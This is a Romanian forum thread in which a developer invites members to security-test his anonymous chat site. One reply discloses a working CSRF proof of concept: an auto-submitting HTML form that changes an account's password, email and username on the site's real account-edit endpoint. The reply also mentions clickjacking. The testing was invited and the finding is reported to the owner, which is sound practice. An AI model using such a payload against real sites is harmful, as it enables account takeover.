Jump to content
aleee

Proiect chat

Recommended Posts

Salut,

Am terminat de realizat un proiect personal pe care as vrea sa il 'testez' putin inainte de a ii da drumul.

Despre ce este vorba? Pe scurt: anonymous chat. Practic iti faci cont si dupa aceea unele persoane 'anonymous' vor comunica cu tine .

Site-ul se bazeaza pe websockets.

Serverul de ws este scris in nodejs iar restul php+mysql.

Cum sa testezi? Te autentifici din browser si dupa aceea te conectezi pe pagina ta de profil cu alt browser sau incognito.

Deci... Daca va puteti uita peste, poate gasiti niste vulnerabilitati (puteti face orice, dupa voi sterge tot db-ul, respectiv conturile).

Dovada: www.chatlike.me/rst.txt

Daca sunt intrebari, sfaturi le astept aici.

Multumesc,

Alexandru

Link to comment
Share on other sites

 <html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF</H2>
<form method="POST" name="form0" action="http://www.chatlike.me/user/edit-account">
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="email" value="test123@test.com"/>
<input type="hidden" name="username" value="test"/>
<input type="hidden" name="name" value="test"/>
<input type="hidden" name="submit-edit-account" value="true"/>
</form>
</body>
</html>

//scuze ca ti-am luat contul test, ai username baubau si aceeasi parola la el, daca il vrei inapoi

//Cu placere, cu ocazia asta pune-ti si un frame busterclicktdt.png

Edited by yo20063
Link to comment
Share on other sites

@aleee eu nu am fost atent de la inceput. Dar azi observ ca vorbesti de chat anonim in care te logezi cu contul de facebook. Daca nu te logezi cu facebook trebuie sa faci un cont de pe care trebuie sa te logezi.

Anonim=Nologs! Pricepi ideea? A n o n i m .

prin anonim poate se refera ca nu stii cu cine vorbesti, gen connected 2 me

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...